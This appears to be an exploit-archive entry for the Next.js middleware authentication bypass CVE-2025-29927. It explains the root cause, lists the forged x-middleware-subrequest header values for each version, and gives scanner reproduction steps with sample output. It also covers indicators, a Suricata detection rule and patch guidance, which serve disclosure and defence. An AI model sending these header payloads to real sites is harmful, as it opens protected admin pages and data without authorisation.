Next.js Corrupt Middleware Auth Bypass (CVE-2025-29927)
by phoscoder · 2026-05-15
- Severity: Critical
- CVE: CVE-2025-29927
- Category: web
- Affected product: Next.js (Vercel)
- Affected versions: 11.1.4 through 15.2.2; fixed in 15.2.3, 14.2.25, 13.5.9, 12.3.5
- Disclosed: 2025-03-21 (Vercel security advisory)
- Patch status: patched
Archive entry: intelseclab/poc-archive
Metadata
| Field | Value |
|---|---|
| Date Added | 2026-05-15 |
| Author / Researcher | phoscoder |
| CVE / Advisory | CVE-2025-29927 |
| Category | web |
| Severity | Critical |
| CVSS Score | 9.1 (CVSSv3) |
| Status | Weaponized |
| Tags | auth-bypass, middleware-bypass, Next.js, unauthenticated, header-injection |
| Related | N/A |
Affected Target
| Field | Value |
|---|---|
| Software / System | Next.js (Vercel) |
| Versions Affected | 11.1.4 through 15.2.2; fixed in 15.2.3, 14.2.25, 13.5.9, 12.3.5 |
| Language / Platform | JavaScript / Node.js |
| Authentication Required | No |
| Network Access Required | Yes |
Summary
CVE-2025-29927 is a critical authentication bypass in Next.js middleware. By sending a crafted x-middleware-subrequest HTTP header, an unauthenticated remote attacker can make the Next.js server skip middleware execution entirely, bypassing authentication guards, redirect logic, security headers and any other control implemented in middleware. Every self-hosted Next.js application (next start or a custom Node server) that relies on middleware for access control and runs a vulnerable version is exploitable from anywhere the server is reachable; per Vercel's advisory, applications hosted on Vercel were already protected at the platform edge. Routes that also enforce authorization inside their own handlers (API routes, server components, data-fetching code) are not opened by the bypass, which is why the remediation below recommends defence in depth.
Vulnerability Details
Root Cause
Next.js marks its own internal sub-requests (for example the hop produced when middleware rewrites to another route) with the header x-middleware-subrequest, so that middleware is not re-run on those hops and cannot recurse indefinitely. The check that honours this marker reads it straight from the incoming request without verifying that Next.js itself set it, so a client can forge it and the framework short-circuits, skipping the middleware without running any handler code. Which value triggers the skip depends on the version and on where the middleware file lives:
- before 12.2, the header is compared with the module path of the middleware file, pages/_middleware;
- from 12.2 through 14.x, the header is split on ":" and the skip fires if any element equals the middleware name, which is middleware for a root-level middleware.ts and src/middleware when the file sits under src/;
- in 15.x before 15.2.3, the framework counts the colon-separated occurrences of the name against a recursion depth limit of 5, so the value must repeat the name five times, e.g. middleware:middleware:middleware:middleware:middleware (or the src/middleware equivalent).
All three forms are equally exploitable; the attacker simply has to send the variant that matches the target's version and layout.
Attack Vector
An unauthenticated attacker sends a standard HTTP GET request to a protected path (e.g. /admin) on the target Next.js application, adding the header:
x-middleware-subrequest: middleware
Because the accepted value depends on the Next.js version and on whether the middleware file lives under src/, several payload variants must be tried. No authentication, session, or prior knowledge of the application is required beyond the protected URL.
Impact
Complete bypass of all Next.js middleware-enforced access controls. An attacker can access any route that is protected only via middleware — including admin panels, authenticated APIs, and user dashboards — without valid credentials. Depending on the application, this may lead to sensitive data exposure, privilege escalation, account takeover, or full administrative access.
Environment / Lab Setup
OS: Any (Linux, macOS, Windows)
Target: Any publicly reachable, self-hosted Next.js application running 11.1.4 through 15.2.2 (15.x < 15.2.3, 14.x < 14.2.25, 13.x < 13.5.9, 12.x < 12.3.5)
Attacker: Any host with Python 3 and network access to the target
Tools: Python 3, requests library
Setup Steps
Proof of Concept
Step-by-Step Reproduction
1. Identify a Next.js target: confirm the site runs Next.js (look for an x-powered-by: Next.js response header or for assets served from /_next/static).
2. Run the scanner against a protected path; the tool iterates through all known payload variants automatically:
   python exploit.py https://target.example.com /admin
3. Inspect the results: if the response status code is 2xx and the final URL is not a login/register page, the site is likely vulnerable. For the full request and response details:
   python exploit.py https://target.example.com /admin --verbose --show-headers
4. Confirm the bypass manually: a direct request without the header should redirect (302) to a login page, while the same request with the bypass header should return the protected page directly (200).
Exploit Code
See exploit.py in this folder.
Expected Output
🕵️ Checking https://target.example.com for Next.js Middleware Vulnerability (CVE-2025-29927)
🔍 Tested payload: middleware
Status Code: 200
Accessed URL: https://target.example.com/admin
✅ Status code 200 is a success code
❌ login Path not found in URL: https://target.example.com/admin
❌ register Path not found in URL: https://target.example.com/admin
🚨 POTENTIAL VULNERABILITY DETECTED with payload: middleware
The site might be vulnerable to middleware bypass!
Screenshots / Evidence
screenshots/ — add evidence of successful exploitation here
Detection & Indicators of Compromise
Legitimate external clients never send x-middleware-subrequest; any occurrence at the edge or in the application's request logs is an attempt, whatever the value. The values seen in the public tooling are:
x-middleware-subrequest: middleware
x-middleware-subrequest: src/middleware
x-middleware-subrequest: pages/_middleware
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware
x-middleware-subrequest: src/middleware:src/middleware:src/middleware:src/middleware:src/middleware
SIEM / IDS Rule (Suricata-style example; the header name is case-insensitive, hence nocase):
alert http any any -> $HTTP_SERVERS any (
msg:"Next.js CVE-2025-29927 middleware bypass attempt";
flow:established,to_server;
content:"x-middleware-subrequest"; http_header; nocase;
classtype:web-application-attack;
sid:9000010; rev:1;
)
Remediation
| Action | Detail |
|---|---|
| Patch | Upgrade Next.js to 15.2.3, 14.2.25, 13.5.9, or 12.3.5 (whichever matches your major version) |
| Workaround | Strip the x-middleware-subrequest header at your reverse proxy / CDN / WAF before it reaches the Next.js application |
| Config Hardening | Enforce authentication at the application layer (API route or server-side) in addition to middleware; do not rely solely on middleware for access control |
References
- CVE-2025-29927 — NVD
- Next.js and the corrupt middleware: the authorizing artifact — zhero-web-sec
- Vercel / Next.js Security Advisory
- Source Repository — phoscoder/ghost-route
Notes
Auto-ingested from https://github.com/phoscoder/ghost-route on 2026-05-15.
Original research credited to Rachid A. (@zhero___) and Yasser Allam (@inzo____). The vulnerability is fully patched in the versions listed above; however, any application running an older version and relying exclusively on middleware for route protection remains at risk until upgraded.